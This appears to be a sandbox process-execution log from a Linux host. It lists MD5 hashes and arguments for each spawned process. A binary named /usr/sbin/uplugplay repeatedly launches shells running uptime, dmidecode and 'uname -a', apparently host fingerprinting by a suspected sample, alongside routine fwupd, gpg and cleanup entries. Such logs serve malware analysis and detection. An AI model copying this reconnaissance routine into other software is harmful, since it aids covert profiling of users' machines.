                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c uptime
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/uptime
                                                              Arguments:uptime
                                                              File size:14568 bytes
                                                              MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c dmidecode
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:05
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/dmidecode
                                                              Arguments:dmidecode
                                                              File size:121856 bytes
                                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                              Start time (UTC):09:43:06
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:06
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "uname -a"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:07
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:07
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/uname
                                                              Arguments:uname -a
                                                              File size:39288 bytes
                                                              MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                                              Start time (UTC):09:43:07
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:07
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c uptime
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:07
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:07
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/uptime
                                                              Arguments:uptime
                                                              File size:14568 bytes
                                                              MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                                              Start time (UTC):09:43:07
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:f754da11d56273194970ea9f6544059b

                                                              Start time (UTC):09:43:07
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "uname -a"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:07
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:43:07
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/uname
                                                              Arguments:uname -a
                                                              File size:39288 bytes
                                                              MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                                              Start time (UTC):09:43:04
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):09:43:04
                                                              Start date (UTC):31/03/2025
                                                              Path:/lib/systemd/systemd-hostnamed
                                                              Arguments:/lib/systemd/systemd-hostnamed
                                                              File size:35040 bytes
                                                              MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                                                              Start time (UTC):09:43:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/libexec/fwupd/fwupd
                                                              Arguments:-
                                                              File size:260616 bytes
                                                              MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                              Start time (UTC):09:43:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/gpg
                                                              Arguments:/usr/bin/gpg --version
                                                              File size:1066992 bytes
                                                              MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                              Start time (UTC):09:43:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/libexec/fwupd/fwupd
                                                              Arguments:-
                                                              File size:260616 bytes
                                                              MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                              Start time (UTC):09:43:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/gpg
                                                              Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
                                                              File size:1066992 bytes
                                                              MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                              Start time (UTC):09:43:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/libexec/fwupd/fwupd
                                                              Arguments:-
                                                              File size:260616 bytes
                                                              MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                              Start time (UTC):09:43:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/gpg
                                                              Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
                                                              File size:1066992 bytes
                                                              MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                              Start time (UTC):09:43:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/libexec/fwupd/fwupd
                                                              Arguments:-
                                                              File size:260616 bytes
                                                              MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                              Start time (UTC):09:43:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/gpg
                                                              Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
                                                              File size:1066992 bytes
                                                              MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                              Start time (UTC):09:43:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/libexec/fwupd/fwupd
                                                              Arguments:-
                                                              File size:260616 bytes
                                                              MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                              Start time (UTC):09:43:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/gpg
                                                              Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
                                                              File size:1066992 bytes
                                                              MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                              Start time (UTC):09:44:18
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/dash
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:44:18
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/rm
                                                              Arguments:rm -f /tmp/tmp.79LwtjX6wQ /tmp/tmp.udDZnLgcZV /tmp/tmp.DF8pyLiTt4
                                                              File size:72056 bytes
                                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                              Start time (UTC):09:44:18
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/dash
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:44:18
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/rm
                                                              Arguments:rm -f /tmp/tmp.79LwtjX6wQ /tmp/tmp.udDZnLgcZV /tmp/tmp.DF8pyLiTt4
                                                              File size:72056 bytes
                                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b